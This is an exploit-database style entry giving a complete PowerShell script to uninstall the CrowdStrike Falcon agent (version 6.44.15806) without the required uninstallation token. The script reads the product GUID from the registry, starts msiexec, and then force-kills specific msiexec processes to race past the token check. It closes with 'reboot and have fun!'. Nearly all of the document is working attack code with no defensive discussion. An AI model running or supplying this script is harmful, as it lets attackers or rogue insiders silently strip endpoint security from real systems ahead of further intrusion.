# Exploit Title: CrowdStrike Falcon AGENT  6.44.15806  - Uninstall without Installation Token 
# Date: 30/11/2022 
# Exploit Author: Walter Oberacher, Raffaele Nacca, Davide Bianchin, Fortunato Lodari, Luca Bernardi (Deda Cloud Cybersecurity Team) 
# Vendor Homepage: https://www.crowdstrike.com/ 
# Author Homepage: https://www.deda.cloud/ 
# Tested On: All Windows versions 
# Version: 6.44.15806 
# CVE: Based on CVE-2022-2841; Modified by Deda Cloud Purple Team members, to exploit hotfixed release. Pubblication of of CVE-2022-44721 in progress. 


$InstalledSoftware = Get-ChildItem "HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall"

foreach($obj in $InstalledSoftware){
    if ("CrowdStrike Sensor Platform" -eq $obj.GetValue('DisplayName'))
    {
        $uninstall_uuid = $obj.Name.Split("\")[6]
    }
}

$g_msiexec_instances = New-Object System.Collections.ArrayList

Write-Host "[+] Identified installed Falcon: $uninstall_uuid"
Write-Host "[+] Running uninstaller for Crowdstrike Falcon . . ."
Start-Process "msiexec" -ArgumentList "/X$uninstall_uuid"

while($true)
{
  if (get-process -Name "CSFalconService") {
    Get-Process | Where-Object { $_.Name -eq "msiexec" } | ForEach-Object {
      
      if (-Not $g_msiexec_instances.contains($_.id)){
        $g_msiexec_instances.Add($_.id)
        if (4 -eq $g_msiexec_instances.count -or 5 -eq $g_msiexec_instances.count){
          Start-Sleep -Milliseconds 100
          Write-Host "[+] Killing PID " + $g_msiexec_instances[-1]
          stop-process -Force -Id $g_msiexec_instances[-1]        
        }

      }
    
    }
  } else { 
    Write-Host "[+] CSFalconService process vanished...reboot and have fun!"
    break
  }
}